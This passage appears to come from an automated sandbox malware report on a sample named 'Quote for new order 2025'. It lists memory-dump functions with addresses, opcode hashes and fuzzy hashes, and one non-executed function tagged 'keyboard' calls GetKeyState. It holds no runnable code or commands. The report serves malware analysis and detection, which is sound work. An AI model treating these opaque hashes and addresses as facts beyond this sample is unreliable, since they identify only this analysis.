                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                        • Instruction ID: bb651665f5150e95b9923059fc39a946e3085d06df8598d3c6a71db6396655af
                                                                                                                                                        • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                        • Instruction Fuzzy Hash: 8411B275504280CFDB12CF54D5C4B56FFB1FB84328F24C6AAD8494B656C33AD44ACB92
                                                                                                                                                        Function 010BD2CF Relevance: .1, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529090688.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_10bd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
                                                                                                                                                        • Instruction ID: 472dee24e870b57d2891f12ff204d11aa7ea00dda4b4df20d168968eca717723
                                                                                                                                                        • Opcode Fuzzy Hash: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
                                                                                                                                                        • Instruction Fuzzy Hash: BB11E371505680DFD712CF18D5C4759FFA1FB84618F24C6AAD8894B657C33AD40ACB92
                                                                                                                                                        Function 010AD75D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3528976256.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_10ad000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: cb44c97ae97894ceac278c5ce70dd79721b5c2fcb0c1a9e28bfb4a10ad3de650
                                                                                                                                                        • Instruction ID: 8812ca0241abc894bf5a7739a1ae39d09563419b89731287e376070b38e4cef6
                                                                                                                                                        • Opcode Fuzzy Hash: cb44c97ae97894ceac278c5ce70dd79721b5c2fcb0c1a9e28bfb4a10ad3de650
                                                                                                                                                        • Instruction Fuzzy Hash: 9C01F7310083809EE7158EE9C984B6FFFD8FF41760F58C46AED490A596E238D840C772
                                                                                                                                                        Function 010AD6E7 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3528976256.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_10ad000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 737b48ddfc4707ee8b15b7e7805a5be7dafe35837b3651c86d12ded9e0f626a6
                                                                                                                                                        • Instruction ID: c1b94afbc731ecb739d3c5ea7cb29cd6f5207ce87898eb5e4b950d8a0a7db539
                                                                                                                                                        • Opcode Fuzzy Hash: 737b48ddfc4707ee8b15b7e7805a5be7dafe35837b3651c86d12ded9e0f626a6
                                                                                                                                                        • Instruction Fuzzy Hash: 94F04976200640AF97248F0AC884C27FBEDFBC4770315C59AEC4A4B612C231EC41CFA0
                                                                                                                                                        Function 010AD75C Relevance: .0, Instructions: 36COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3528976256.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_10ad000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: ccb970af22aeaf2960c1c0a98bb3108c9e0f29c456fe4e7003fd542c75f537d1
                                                                                                                                                        • Instruction ID: 4efa02f9657ec28970e94a7fd9ef9f1d73bb02ad52bab04ff1d33eaebd13344d
                                                                                                                                                        • Opcode Fuzzy Hash: ccb970af22aeaf2960c1c0a98bb3108c9e0f29c456fe4e7003fd542c75f537d1
                                                                                                                                                        • Instruction Fuzzy Hash: A2F0C2710043809EE7158E5AC884B66FFE8FF41624F18C45AED480A286D2799844CB71
                                                                                                                                                        Function 010AD6D8 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3528976256.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_10ad000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 469c96725b02237e5aa2d048a94878fc2e1604e12afdb20ac868d88dad6829d8
                                                                                                                                                        • Instruction ID: 4da13fefdb73d5ad4c591f262506851779c0b41fd621f3fa1f0c08d429de0850
                                                                                                                                                        • Opcode Fuzzy Hash: 469c96725b02237e5aa2d048a94878fc2e1604e12afdb20ac868d88dad6829d8
                                                                                                                                                        • Instruction Fuzzy Hash: 58F08734104680AFD3258F06C880C23BFF9FF8A7607198489E88A4B222C231FC42CB60

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 0759E8B0 Relevance: 7.6, APIs: 5, Instructions: 116keyboardCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetKeyState.USER32(00000001), ref: 0759E90D
                                                                                                                                                        • GetKeyState.USER32(00000002), ref: 0759E952
                                                                                                                                                        • GetKeyState.USER32(00000004), ref: 0759E997
                                                                                                                                                        • GetKeyState.USER32(00000005), ref: 0759E9DC
                                                                                                                                                        • GetKeyState.USER32(00000006), ref: 0759EA21
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: State
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1649606143-0
                                                                                                                                                        • Opcode ID: 557223a5e579fa45b16bcfc264cd934ee512ff251a269872cdb941a5331b4279
                                                                                                                                                        • Instruction ID: 7090ad858459bf3b5ac838759d56eb345276c371ac008508bf8335e6b0e3c7ce
                                                                                                                                                        • Opcode Fuzzy Hash: 557223a5e579fa45b16bcfc264cd934ee512ff251a269872cdb941a5331b4279
                                                                                                                                                        • Instruction Fuzzy Hash: B64160B180078A8EEF11DF59C5493EFBFF4BB05309F208429D499A7290C7B9A645CF92